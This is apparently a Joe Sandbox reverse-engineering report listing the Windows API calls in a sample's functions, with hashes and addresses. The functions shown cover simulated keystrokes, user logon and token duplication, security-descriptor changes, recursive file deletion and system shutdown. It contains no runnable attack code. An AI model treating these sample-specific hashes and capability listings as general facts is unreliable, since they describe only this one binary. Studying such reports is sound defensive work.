                                                                      • API String ID: 3429851547-4164748364
                                                                      • Opcode ID: b4aad3826d063067c3a6609129cd3f453fcb2c2b42d21b2ea6c81f35a249ffb3
                                                                      • Instruction ID: 4a2e24b03d3134f608c2b0a2f53c32a0dda0b1e47155809f95125d57cff8d57b
                                                                      • Opcode Fuzzy Hash: b4aad3826d063067c3a6609129cd3f453fcb2c2b42d21b2ea6c81f35a249ffb3
                                                                      • Instruction Fuzzy Hash: A8428A34204651AFDB20CF24CC84FAABBF5FF49310F144619FAA9972A1D771EA50DB92
                                                                      Function 00CB4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00CB48F3
                                                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00CB4908
                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00CB4927
                                                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00CB494B
                                                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00CB495C
                                                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00CB497B
                                                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00CB49AE
                                                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00CB49D4
                                                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00CB4A0F
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CB4A56
                                                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00CB4A7E
                                                                      • IsMenu.USER32(?), ref: 00CB4A97
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CB4AF2
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CB4B20
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB4B94
                                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00CB4BE3
                                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00CB4C82
                                                                      • wsprintfW.USER32 ref: 00CB4CAE
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CB4CC9
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CB4CF1
                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00CB4D13
                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CB4D33
                                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00CB4D5A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                                      • String ID: %d/%02d/%02d
                                                                      • API String ID: 4054740463-328681919
                                                                      • Opcode ID: 76b1817553488c7a050a9e9087ff5113ea346342404f4a477c0c54415a2dec31
                                                                      • Instruction ID: a122e118474ddbfcdd26809bd45c5f14441db97658f21f2cb3154076f484388f
                                                                      • Opcode Fuzzy Hash: 76b1817553488c7a050a9e9087ff5113ea346342404f4a477c0c54415a2dec31
                                                                      • Instruction Fuzzy Hash: CD12DF71604214ABEB298F69CC49FEE7BF8EF45710F104229F525EB2E2DB749A41CB50
                                                                      Function 00C3F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00C3F998
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C7F474
                                                                      • IsIconic.USER32(00000000), ref: 00C7F47D
                                                                      • ShowWindow.USER32(00000000,00000009), ref: 00C7F48A
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C7F494
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7F4AA
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C7F4B1
                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00C7F4BD
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7F4CE
                                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00C7F4D6
                                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00C7F4DE
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C7F4E1
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F4F6
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F501
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F50B
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F510
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F519
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F51E
                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C7F528
                                                                      • keybd_event.USER32(00000012,00000000), ref: 00C7F52D
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C7F530
                                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00C7F557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 8f730b6615a5084fc8b750604ca868fdb85f7508fce69228e1cf18d16974117c
                                                                      • Instruction ID: d9609286de4137d328844bdc82a4a6ef913dc81620b3235540c94d86d2e1aa65
                                                                      • Opcode Fuzzy Hash: 8f730b6615a5084fc8b750604ca868fdb85f7508fce69228e1cf18d16974117c
                                                                      • Instruction Fuzzy Hash: CE316471A40318BFEB306BB59C8AFBF7E6CEB44B50F10416AFA15F61D1C6B15D01AA60
                                                                      Function 00C81201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C8170D
                                                                        • Part of subcall function 00C816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C8173A
                                                                        • Part of subcall function 00C816C3: GetLastError.KERNEL32 ref: 00C8174A
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C81286
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C812A8
                                                                      • CloseHandle.KERNEL32(?), ref: 00C812B9
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C812D1
                                                                      • GetProcessWindowStation.USER32 ref: 00C812EA
                                                                      • SetProcessWindowStation.USER32(00000000), ref: 00C812F4
                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C81310
                                                                        • Part of subcall function 00C810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C811FC), ref: 00C810D4
                                                                        • Part of subcall function 00C810BF: CloseHandle.KERNEL32(?,?,00C811FC), ref: 00C810E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      • Opcode ID: d475a9854bbdd436ef4b16ac04823d13bbafa8f4c037938fc4a3374aceab2cd9
                                                                      • Instruction ID: 3efc1373edd04eb24c8680d03162c2da53dac4a55e663825dc877c4f570359fa
                                                                      • Opcode Fuzzy Hash: d475a9854bbdd436ef4b16ac04823d13bbafa8f4c037938fc4a3374aceab2cd9
                                                                      • Instruction Fuzzy Hash: 88818C71900209AFDF11AFA5DC89FEE7BBDEF44708F184129F921A61A0D7318A46DB24
                                                                      Function 00C80B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C81114
                                                                        • Part of subcall function 00C810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81120
                                                                        • Part of subcall function 00C810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C8112F
                                                                        • Part of subcall function 00C810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81136
                                                                        • Part of subcall function 00C810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C8114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C80BCC
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C80C00
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80C17
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C80C51
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C80C6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C80C84
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C80C8C
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C80C93
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C80CB4
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C80CBB
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C80CEA
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C80D0C
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C80D1E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80D45
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D4C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80D55
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D5C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C80D65
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D6C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C80D78
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C80D7F
                                                                        • Part of subcall function 00C81193: GetProcessHeap.KERNEL32(00000008,00C80BB1,?,00000000,?,00C80BB1,?), ref: 00C811A1
                                                                        • Part of subcall function 00C81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C80BB1,?), ref: 00C811A8
                                                                        • Part of subcall function 00C81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C80BB1,?), ref: 00C811B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: 1fe07e153177f5af35c8d5293d31a862b83900b0ba7e59ffd81d85550c02cd85
                                                                      • Instruction ID: fc895690775c07d1da247464c238e69bd55644cf0834599184048b3323e88e28
                                                                      • Opcode Fuzzy Hash: 1fe07e153177f5af35c8d5293d31a862b83900b0ba7e59ffd81d85550c02cd85
                                                                      • Instruction Fuzzy Hash: A8716E7290020AAFDF50EFA4DC84FAEBBB8BF04304F14461AF914A7191D771AA09CB60
                                                                      Function 00C9698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C969BE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C96A12
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C96A4E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C96A75
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C96AB2
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C96ADF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      • Opcode ID: ad87568f2836a3b3629f1dd20668f0b9a90262596b925449b8e93caaa8425159
                                                                      • Instruction ID: 8e5895911970f4ce419b43861cdc6cd077e902f31ef2436b0b2333d694eb8f4e
                                                                      • Opcode Fuzzy Hash: ad87568f2836a3b3629f1dd20668f0b9a90262596b925449b8e93caaa8425159
                                                                      • Instruction Fuzzy Hash: 60D15EB2508350AFC710EBA4D995EAFB7ECBF88704F44491DF585C6291EB34DA08DB62
                                                                      Function 00C99642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C99663
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C996A1
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00C996BB
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C996D3
                                                                      • FindClose.KERNEL32(00000000), ref: 00C996DE
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C996FA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C9974A
                                                                      • SetCurrentDirectoryW.KERNEL32(00CE6B7C), ref: 00C99768
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C99772
                                                                      • FindClose.KERNEL32(00000000), ref: 00C9977F
                                                                      • FindClose.KERNEL32(00000000), ref: 00C9978F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: 73fa7314986419c50c56b12c0578c7b09a87098f68109ea9dd91af3815fa8213
                                                                      • Instruction ID: d74c898258ecdcc0378eb117d3120593c56a95c12d7572184e6bcb2251e7007a
                                                                      • Opcode Fuzzy Hash: 73fa7314986419c50c56b12c0578c7b09a87098f68109ea9dd91af3815fa8213
                                                                      • Instruction Fuzzy Hash: B031A3325402196BDF24AFF9DC8DBDE77ACEF49320F14426AF915E21A0DB74DA448A24
                                                                      Function 00C9979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C997BE
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C99819
                                                                      • FindClose.KERNEL32(00000000), ref: 00C99824
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C99840
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C99890
                                                                      • SetCurrentDirectoryW.KERNEL32(00CE6B7C), ref: 00C998AE
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C998B8
                                                                      • FindClose.KERNEL32(00000000), ref: 00C998C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00C998D5
                                                                        • Part of subcall function 00C8DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C8DB00
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: 62b328f67971ff25f2d11fc4e77e70ab09d02d0b36d81d0280e1ed88919ff8d3
                                                                      • Instruction ID: 297f455901cd246c1bcf01e85ac041b12dda6683e1c10f1bd4bddc755a1aa6bb
                                                                      • Opcode Fuzzy Hash: 62b328f67971ff25f2d11fc4e77e70ab09d02d0b36d81d0280e1ed88919ff8d3
                                                                      • Instruction Fuzzy Hash: E231A5315006196BDF24AFB9DC4CADE77ACEF06320F14416DE864A21E1DB71DA44DA64
                                                                      Function 00C98195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocalTime.KERNEL32(?), ref: 00C98257
                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00C98267
                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C98273
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C98310
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98324
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98356
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C9838C
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                      • String ID: *.*
                                                                      • API String ID: 1464919966-438819550
                                                                      • Opcode ID: 9e3b60d65ef9c975ea9d3f6293a2cf06cbf116ff60d184686d9227a0bc6a4307
                                                                      • Instruction ID: f18cfb87b9e79a8386ea9292d4563c544ea199aea27f293e236bac4f35665292
                                                                      • Opcode Fuzzy Hash: 9e3b60d65ef9c975ea9d3f6293a2cf06cbf116ff60d184686d9227a0bc6a4307
                                                                      • Instruction Fuzzy Hash: FC617D715043059FCB10EF64D884A9EB3E8FF89314F04492DF999D7251DB31EA49CB92
                                                                      Function 00C8D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                        • Part of subcall function 00C8E199: GetFileAttributesW.KERNEL32(?,00C8CF95), ref: 00C8E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C8D122
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C8D1DD
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C8D1F0
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C8D20D
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8D237
                                                                        • Part of subcall function 00C8D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C8D21C,?,?), ref: 00C8D2B2
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00C8D253
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8D264
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: 08334d5fc61598e4d3597dec9fabe932be2ad3f285194b4463f2d36f6eeacc82
                                                                      • Instruction ID: a0ca28f4b5b9e6cd379f2dd4203914de4dead61868f2cb3c24074db6529446cb
                                                                      • Opcode Fuzzy Hash: 08334d5fc61598e4d3597dec9fabe932be2ad3f285194b4463f2d36f6eeacc82
                                                                      • Instruction Fuzzy Hash: C3618C31C0115DABCF05FBE0EA92AEDB7B9AF55304F244165E402771A2EB306F09EB65
                                                                      Function 00C8E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C8170D
                                                                        • Part of subcall function 00C816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C8173A
                                                                        • Part of subcall function 00C816C3: GetLastError.KERNEL32 ref: 00C8174A
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00C8E932
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: bca24b24f97498230c13d5779e11b328cc210d20e62a41037ec5ba4d2c58aab3
                                                                      • Instruction ID: 905dc65e19794cc47bb1acca437fb302b66c6f7f24af26bc81eb036cfb5a65e9
                                                                      • Opcode Fuzzy Hash: bca24b24f97498230c13d5779e11b328cc210d20e62a41037ec5ba4d2c58aab3
                                                                      • Instruction Fuzzy Hash: E601F972610211ABEB6436B59CC6FFF729C9714759F194521FC13E31E2D6E09D4093A8
                                                                      Function 00C5B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C5B9D4
                                                                      • _free.LIBCMT ref: 00C5B9F8
                                                                      • _free.LIBCMT ref: 00C5BB7F
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CC3700), ref: 00C5BB91
